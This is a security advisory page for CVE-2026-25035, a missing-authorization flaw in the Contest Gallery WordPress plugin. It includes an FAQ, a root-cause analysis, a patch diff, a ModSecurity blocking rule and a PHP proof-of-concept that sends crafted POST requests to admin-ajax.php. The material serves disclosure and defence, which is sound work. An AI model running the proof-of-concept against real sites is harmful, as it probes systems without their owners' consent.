What is CVE-2026-25035?

CVE-2026-25035 is a medium-severity vulnerability in the Contest Gallery plugin for WordPress, affecting versions up to and including 28.1.2.2. It is caused by a missing authorization check that allows unauthenticated attackers to perform unauthorized actions through a vulnerable AJAX endpoint.

How does this vulnerability work?

The vulnerability exists in the `post_cg1l_current_frontend_nonce()` function, which processes AJAX requests without verifying user permissions. Attackers can exploit this by sending crafted POST requests to the WordPress admin-ajax.php endpoint, allowing them to access functionality intended for authenticated users.

Who is affected by CVE-2026-25035?

All WordPress installations using the Contest Gallery plugin version 28.1.2.2 or earlier are affected. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Contest Gallery plugin installed on your WordPress site. If it is version 28.1.2.2 or earlier, your site is susceptible to this vulnerability.

How can I fix the vulnerability?

To mitigate this vulnerability, update the Contest Gallery plugin to version 28.1.3 or later, where the issue has been patched. Regularly updating plugins is essential for maintaining site security.

What does the CVSS score of 5.3 indicate?

The CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk and should be addressed promptly to prevent potential exploitation.

What are the potential risks associated with this vulnerability?

If exploited, this vulnerability could allow unauthorized access to gallery management functions, manipulation of user data, or privilege escalation within the plugin. The exact impact depends on the actions that the nonce enables.

What is a proof of concept (PoC) in this context?

The proof of concept provided demonstrates how an attacker can exploit the vulnerability by sending a crafted AJAX request to the vulnerable endpoint. It illustrates the lack of authorization checks and how unauthorized actions can be performed.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Contest Gallery plugin until a patch can be applied. This will prevent potential exploitation while you work on a solution.

Are there any other security best practices to follow?

In addition to updating plugins, always ensure that your WordPress installation, themes, and other plugins are up to date. Regularly review user permissions and implement security measures such as firewalls and security plugins.

Where can I find more information about this vulnerability?

For more detailed information, you can refer to the official CVE database, security advisories from the plugin developer, or trusted security research websites that analyze vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-25035: Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 28.1.2.2 – Missing Authorization (contest-gallery)

Q: How does the patch address the vulnerability?

The patch for CVE-2026-25035 adds an authorization check before executing the nonce generation logic. It verifies the `cgGetLoggedInFrontendUserKey` parameter against a stored value in user metadata, ensuring that only authenticated users can access the functionality.

CVE ID CVE-2026-25035

Plugin contest-gallery

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 28.1.2.2

Patched Version 28.1.3

Disclosed March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25035:
This vulnerability is a Missing Authorization flaw in the Contest Gallery WordPress plugin, affecting versions up to and including 28.1.2.2. The vulnerability allows unauthenticated attackers to perform unauthorized actions by exploiting an insufficiently protected AJAX endpoint. The CVSS score of 5.3 reflects a medium-severity impact.

Atomic Edge research identified the root cause in the `post_cg1l_current_frontend_nonce()` function within `/contest-gallery/ajax/ajax-functions-frontend.php`. The function lacked any authorization or capability check before executing its logic. The vulnerable code (lines 183-196 in the diff) processed AJAX requests without verifying user permissions. The function directly responded to AJAX requests containing the `cgJustLoggedInWpUserId` and `cgGetLoggedInFrontendUserKey` parameters without validating the requester’s identity or rights.

Exploitation requires sending a crafted POST request to the WordPress admin-ajax.php endpoint with the action parameter set to trigger the vulnerable function. Attackers would target the AJAX handler at `/wp-admin/admin-ajax.php` with `action=post_cg1l_current_frontend_nonce`. The payload must include `cgJustLoggedInWpUserId` and `cgGetLoggedInFrontendUserKey` parameters. Successful exploitation allows unauthorized access to functionality intended only for authenticated users.

The patch adds an authorization check before executing the nonce generation logic. The updated code (lines 183-204) now validates the `cgGetLoggedInFrontendUserKey` parameter against a stored value in user metadata. The patch introduces three key changes: it retrieves the stored key via `get_user_meta()`, compares it with the submitted key, and only executes the nonce generation if they match. After successful validation, the patch deletes the temporary key using `delete_user_meta()`. This ensures only users with valid session keys can access the functionality.

Successful exploitation allows attackers to perform actions reserved for authenticated users. The vulnerability could enable unauthorized access to gallery management functions, user data manipulation, or privilege escalation within the plugin context. While the exact impact depends on what actions the nonce enables, the missing authorization check creates a direct path for unauthenticated attackers to bypass security controls.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/contest-gallery/ajax/ajax-functions-frontend.php
+++ b/contest-gallery/ajax/ajax-functions-frontend.php
@@ -183,12 +183,17 @@
     function post_cg1l_current_frontend_nonce()
     {
         if (defined('DOING_AJAX') && DOING_AJAX) {
-
+            $WpUserId = absint($_POST['cgJustLoggedInWpUserId']);
+            $cgGetLoggedInFrontendUserKey = sanitize_text_field($_POST['cgGetLoggedInFrontendUserKey']);
+            $cgGetLoggedInFrontendUserKeyToCompare = get_user_meta( $WpUserId,'cgGetLoggedInFrontendUserKey',true);
+            if(!empty($cgGetLoggedInFrontendUserKeyToCompare) && $cgGetLoggedInFrontendUserKeyToCompare == $cgGetLoggedInFrontendUserKey){
         ?>
         <script data-cg-processing-current-nonce="true">
             cgJsClass.gallery.vars.currentCgNonce = <?php echo json_encode(wp_create_nonce('cg1l_action')); ?>;
         </script>
         <?php
+                delete_user_meta( $WpUserId,'cgGetLoggedInFrontendUserKey');
+            }
             exit();
         } else {
             exit();
@@ -206,6 +211,9 @@
             $tablename = $wpdb->prefix . "contest_gal1ery";
             $gid = absint($_POST['cgl_gid']);
             $activation_key = sanitize_text_field($_POST['cglKey']);
+            if(empty($activation_key)){
+                exit();
+            }
             $userRow = $wpdb->get_row(
                 $wpdb->prepare(
                     "SELECT *
--- a/contest-gallery/functions/general/cg-get-version.php
+++ b/contest-gallery/functions/general/cg-get-version.php
@@ -17,7 +17,7 @@
 if(!function_exists('cg_get_version_for_scripts')){
     function cg_get_version_for_scripts () {
         /**###NORMAL###**/
-        return '28.1.2.2';
+        return '28.1.3';
         /**###NORMAL-END###**/
     }
 }
 No newline at end of file
--- a/contest-gallery/index.php
+++ b/contest-gallery/index.php
@@ -2,7 +2,7 @@
 /*
 Plugin Name: Contest Gallery
 Description: Upload form, files, photos and videos upload contest gallery plugin for WordPress. Create upload forms for entries with or without file/image upload. Create user registration form. Create login form. Create responsive galleries and allow to vote for any kind of entries. Sell entries via PayPal or Stripe API. Create or edit images via OpenAI API.
-Version: 28.1.2.2
+Version: 28.1.3
 Author: Contest Gallery
 Plugin URI: https://www.contest-gallery.com
 Author URI: https://www.contest-gallery.com
--- a/contest-gallery/v10/v10-admin/users/frontend/registry/users-registry-check-after-email-or-pin-confirmation.php
+++ b/contest-gallery/v10/v10-admin/users/frontend/registry/users-registry-check-after-email-or-pin-confirmation.php
@@ -345,11 +345,15 @@

             if($pinHash){// login here
                 //wp_set_auth_cookie( $newWpId,true );// will be done ajax
+                $cgGetLoggedInFrontendUserKey = wp_hash_password(wp_generate_password( 32, true, true ));
+                update_user_meta( $newWpId, 'cgGetLoggedInFrontendUserKey', $cgGetLoggedInFrontendUserKey);
                 ?>
                 <script  data-cg-processing="true" data-cg-success="true">
                     cgJsClass.gallery.vars.pinMessage = 'success';
                     cgJsClass.gallery.vars.pinVerified = true;
                     cgJsClass.gallery.vars.activationKeyConfirmed = <?php echo json_encode($cgkeyForWpUserTable.'-confirmed');?>;
+                    cgJsClass.gallery.vars.cgGetLoggedInFrontendUserKey = <?php echo json_encode($cgGetLoggedInFrontendUserKey);?>;
+                    cgJsClass.gallery.vars.cgJustLoggedInWpUserId = <?php echo json_encode($newWpId);?>;
                 </script>
                 <?php
                 die;

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-25035
# This rule blocks unauthenticated access to the vulnerable Contest Gallery AJAX endpoint
# The rule matches the exact vulnerable action and requires the specific parameters
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10025035,phase:2,deny,status:403,chain,msg:'CVE-2026-25035: Unauthenticated Contest Gallery nonce generation attempt',severity:'CRITICAL',tag:'CVE-2026-25035',tag:'WordPress',tag:'Plugin:Contest-Gallery'"
  SecRule ARGS_POST:action "@streq post_cg1l_current_frontend_nonce" "chain"
    SecRule &ARGS_POST:cgJustLoggedInWpUserId "@eq 1" "chain"
      SecRule &ARGS_POST:cgGetLoggedInFrontendUserKey "@eq 1" 
        "t:none,setvar:'tx.cve_2026_25035_blocked=1'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25035 - Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 28.1.2.2 - Missing Authorization
<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// The vulnerability allows unauthenticated access to the post_cg1l_current_frontend_nonce function
// This PoC demonstrates the unauthorized AJAX request

$ch = curl_init();

$post_fields = [
    'action' => 'post_cg1l_current_frontend_nonce',
    'cgJustLoggedInWpUserId' => '1',  // Target user ID - could be brute forced
    'cgGetLoggedInFrontendUserKey' => 'test_key'  // Attempt with arbitrary key
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate AJAX request
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'X-Requested-With: XMLHttpRequest',
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

// Check if the vulnerable endpoint responded
if ($http_code == 200 && strpos($response, 'cgJsClass.gallery.vars.currentCgNonce') !== false) {
    echo "[+] Vulnerability confirmed! Received nonce generation response.n";
    echo "[+] Response snippet: " . substr($response, 0, 200) . "...n";
} else {
    echo "[-] Target may not be vulnerable or is patched. HTTP Code: $http_coden";
    echo "[-] Response: " . substr($response, 0, 200) . "...n";
}

?>

Frequently Asked Questions

What is CVE-2026-25035?
Overview of the vulnerability
CVE-2026-25035 is a medium-severity vulnerability in the Contest Gallery plugin for WordPress, affecting versions up to and including 28.1.2.2. It is caused by a missing authorization check that allows unauthenticated attackers to perform unauthorized actions through a vulnerable AJAX endpoint.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exists in the `post_cg1l_current_frontend_nonce()` function, which processes AJAX requests without verifying user permissions. Attackers can exploit this by sending crafted POST requests to the WordPress admin-ajax.php endpoint, allowing them to access functionality intended for authenticated users.
Who is affected by CVE-2026-25035?
Identifying vulnerable installations
All WordPress installations using the Contest Gallery plugin version 28.1.2.2 or earlier are affected. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Version verification steps
To determine if your site is vulnerable, check the version of the Contest Gallery plugin installed on your WordPress site. If it is version 28.1.2.2 or earlier, your site is susceptible to this vulnerability.
How can I fix the vulnerability?
Updating the plugin
To mitigate this vulnerability, update the Contest Gallery plugin to version 28.1.3 or later, where the issue has been patched. Regularly updating plugins is essential for maintaining site security.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
The CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk and should be addressed promptly to prevent potential exploitation.
What are the potential risks associated with this vulnerability?
Implications of exploitation
If exploited, this vulnerability could allow unauthorized access to gallery management functions, manipulation of user data, or privilege escalation within the plugin. The exact impact depends on the actions that the nonce enables.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
The proof of concept provided demonstrates how an attacker can exploit the vulnerability by sending a crafted AJAX request to the vulnerable endpoint. It illustrates the lack of authorization checks and how unauthorized actions can be performed.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the Contest Gallery plugin until a patch can be applied. This will prevent potential exploitation while you work on a solution.
How does the patch address the vulnerability?
Changes made in the updated version
The patch for CVE-2026-25035 adds an authorization check before executing the nonce generation logic. It verifies the `cgGetLoggedInFrontendUserKey` parameter against a stored value in user metadata, ensuring that only authenticated users can access the functionality.
Are there any other security best practices to follow?
General recommendations
In addition to updating plugins, always ensure that your WordPress installation, themes, and other plugins are up to date. Regularly review user permissions and implement security measures such as firewalls and security plugins.
Where can I find more information about this vulnerability?
Resources for further reading
For more detailed information, you can refer to the official CVE database, security advisories from the plugin developer, or trusted security research websites that analyze vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations